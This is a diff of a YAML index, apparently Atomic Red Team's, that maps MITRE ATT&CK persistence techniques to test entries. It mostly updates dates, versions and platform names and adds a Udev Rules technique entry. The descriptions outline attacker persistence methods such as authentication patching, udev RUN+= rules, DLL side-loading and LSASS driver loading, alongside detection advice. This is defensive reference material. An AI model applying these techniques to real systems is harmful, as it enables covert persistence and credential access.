-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -59392,6 +59763,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -59406,52 +59778,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -59473,6 +59835,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -59483,23 +59846,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -59516,7 +59906,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -59575,7 +59965,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -59657,7 +60046,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -59772,12 +60160,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -59800,16 +60187,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -59836,7 +60222,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -59905,7 +60290,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -59941,7 +60325,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -59960,12 +60344,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -60015,7 +60398,6 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests:
     - name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -60134,7 +60516,7 @@ persistence:
         elevation_required: true
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -60167,9 +60549,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -60186,9 +60569,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -60234,12 +60616,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -60253,7 +60634,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -60312,7 +60693,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -60338,7 +60718,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -60364,8 +60744,6 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests:
     - name: Logon Scripts
@@ -60395,7 +60773,7 @@ persistence:
         name: command_prompt
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -60419,8 +60797,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -60450,7 +60828,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests:
     - name: Office Application Startup Test Persistence (HKCU)
@@ -60535,7 +60912,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -60560,7 +60937,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests:
     - name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -60604,7 +60980,7 @@ persistence:
         elevation_required: true
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60644,8 +61020,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -60653,13 +61031,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -60690,17 +61068,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -60763,7 +61138,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -60797,8 +61172,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -60807,6 +61182,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -60819,7 +61198,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At.exe Scheduled task
@@ -60839,7 +61217,7 @@ persistence:
           '
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -60852,6 +61230,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -60888,17 +61267,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -60944,9 +61323,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -60983,7 +61418,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -61007,7 +61442,6 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests:
     - name: Netsh Helper DLL Registration
@@ -61047,46 +61481,7 @@ persistence:
         elevation_required: true
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
